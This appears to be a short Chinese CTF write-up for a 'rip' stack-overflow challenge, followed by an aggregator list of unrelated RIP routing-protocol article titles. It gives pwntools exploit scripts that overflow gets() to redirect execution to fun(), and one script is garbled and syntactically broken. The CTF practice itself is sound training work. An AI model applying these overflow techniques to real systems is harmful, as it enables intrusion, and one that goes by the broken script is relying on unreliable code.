gets函数不限制输入的长度,存在溢出

查看栈空间,payload = 0xf + 8

发现fun()函数,

构造exp

from pwn import *
p = process('pwn1')
#p = remote('redirect.do-not-trust.hacking.run',10026)
payload = b'A'*0xF+ p64(0x401186)
p.sendline(payload)
p.interactive()

from pwn import *
io = remote('redirect.do-not-trust.hacking.run',10043)context.log_level = 'debug'payload = b"A"*(0xf + 8) +p64(0x401198)+ p64(0x401186
io.sendline(payload)
io.interactive()

这个是网上一个师傅的exp,我调试了好久就是不行,看了这个还是不太懂为啥要加p64(0x401198)
先继续往后做吧!

参考链接:
https://blog.csdn.net/weixin_46436680/article/details/105853304?utm_medium=distribute.pc_aggpage_search_result.none-task-blog-2aggregatepagefirst_rank_ecpm_v1~rank_v31_ecpm-2-105853304.pc_agg_new_rank&utm_term=BUUCTF%E4%B8%ADrip&spm=1000.2123.3001.4430
http://blog.eonew.cn/archives/958

pwnthebox-rip相关推荐

  1. 计算机网络Rip例题,计算机网络技术习题

    1. 由于各种网络的最大传输单元 (MTU) 不同,利用路由器互联时必须对数据包进行分片和________. 重组 2.在转发一个IP数据报过程中,如果路由器发现该数据报报头中的TTL字段为0,那么, ...

  2. 数据通信技术(七:RIP路由水平分割配置)

    RIP路由水平分割配置实验报告 一.知识准备 掌握RIP动态路由的定义和特征. 掌握RIP路由环路的危害和解决技术. 掌握水平分割的工作原理. 二.实验目的 掌握路由器中RIP动态路由水平分割功能的配 ...

  3. RIP协议与OSPF协议与BGP协议

    RIP协议: https://www.bilibili.com/video/BV19E411D78Q?p=54 RIP是一-种分布式的基于距离向量的路由选择协议,是因特网的协议标准,最大优点是简单. ...

  4. 为了解决伴随RIP协议的路由环路问题,可以采用水平分割法,这种方法的核心是(22),而反向毒化方法则是(23)。

    为了解决伴随RIP协议的路由环路问题,可以采用水平分割法,这种方法的核心是(22),而反向毒化方法则是(23). (22) A.把网络水平地分割为多个网段,网段之间通过指定路由器发布路由信息 B.一条 ...

  5. 如果某路由器到达目的网络有三种方式:通过RIP;通过静态路由;通过默认路由,那么路由器会根据哪种方式进行转发数据包?( )

    如果某路由器到达目的网络有三种方式:通过RIP;通过静态路由;通过默认路由,那么路由器会根据哪种方式进行转发数据包?( ) A. 通过RIP B. 通过静态路由 C. 通过默认路由 D. 都可以 答案 ...

  6. ipv6的rip配置

    实验目的:路由器和主机上配置ipv6的rip路由协议,最后实现跨网段互连互通 实验工具:Cisco Packet Tracer 5.3,模拟器中的2811路由器 实验拓扑图: 实验主要配置步骤: Ro ...

  7. 验证RIP被动接口只收不发的正确性

    1.实验目的:验证RIP被动接口只收不发的正确性 2.实验拓扑:R1的s2/1 和 R2的s2/1相连 3.配置命令: R1上的配置(未启动被动接口前的配置) R1(config-line)#int ...

  8. Windows软件路由器典型应用:静态路由、RIP和包过滤

    Windows 2000/2003为我们提供的"路由和远程访问"服务使一台Windows 2000/2003r的计算机成为了全功能的软件路由器.它为局域网 (LAN) 和广域网 ( ...

  9. 路由协议重分发之RIP协议和EIGEP协议

    在现实的生活中我们配置路由器要用到不同的路由协议,如果这样的话,总不能我们配置什么协议就要求对方也配置什么协议吧!显然很不现实,这个时候我们就要想办法让两种不同的协议之间能够实现正常的通讯.今天我们就 ...

  10. 管理距离 路由与交换_动态路由选择原理(距离矢量路由协议RIP)

    一.动态路由协议的基本介绍: 路由协议的分类: 静态路由与动态路由 动态路由分类: 动态路由协议 tips:既然分为内部网关协议和外部网关协议?那们这个内与外相对的是什么呢? 1.在因特网中,会将互联 ...

最新文章

  1. 在python中使用关键字define定义函数_python等价于'define func()'或如何在python中注释掉函数调用...
  2. java 伴随矩阵_C#计算矩阵的逆矩阵方法实例分析
  3. 替换元素节点replaceChild()
  4. 蒙特卡洛分析_随机模拟:马尔科夫链蒙特卡洛采样MCMC与EM算法「2.3」
  5. linux 1号硬盘不能用,linux 挂载硬盘的疑问 : IDE1 上的接口无法使用.
  6. proteus里面没有stm32怎么办_使用C#编写STM32对接物联网平台IoTSharp发送遥测数据
  7. N - 嘤嘤嘤 (并查集+枚举)
  8. 后浪说不,是时代的进步
  9. Windows Mobile之开机自启动
  10. Linux下挂载iscsi存储及多路径功能配置
  11. php模板引擎smarty案例下载,Smarty下载|Smarty(php模板引擎) v3.1.30官方版 - 121下载站...
  12. 曲线运动与万有引力公式_高一物理曲线运动万有引力试题
  13. webui 通过提示词矩阵的文本框功能添加负面标签
  14. 监听拼音输入法确定输入 ,compositionstart 、 compositionend 、 input都存在时的解决办法
  15. 计算机毕业设计Java服装定制管理系统(源码+系统+mysql数据库+lw文档)
  16. 如何抓取BT天堂电影数据
  17. 【css】i标签icon图标旋转样式
  18. python图像锐化 增强边缘_[Python图像处理]十一.图像锐化与边缘检测之Roberts算子、Prewitt算子、Sobel算子和Laplacian算子,Schar算子...
  19. 《文渊阁四库全书》书目
  20. Android模仿手机京东商城实训小项目(含源码)

热门文章

  1. rdt协议的java实现_rdt3.0发送方程序(Java实现)
  2. 指静脉识别标准实施1个月 有何影响?
  3. Linux进程通信 系统调用总结
  4. 兵家必争之地——关于O2O商业模式的一点遐想
  5. 【规律】Cunning Friends
  6. 天正对应cad版本_天正CAD图形找不到可用的AutoCAD版本怎么办?
  7. Hello Juejin
  8. consul剔除无效服务
  9. 阿里云ECS节省计划重磅发布 比包年包月灵活,比按量付费划算,最高节省76%费用
  10. 不要在本该奋斗的年纪选择了安逸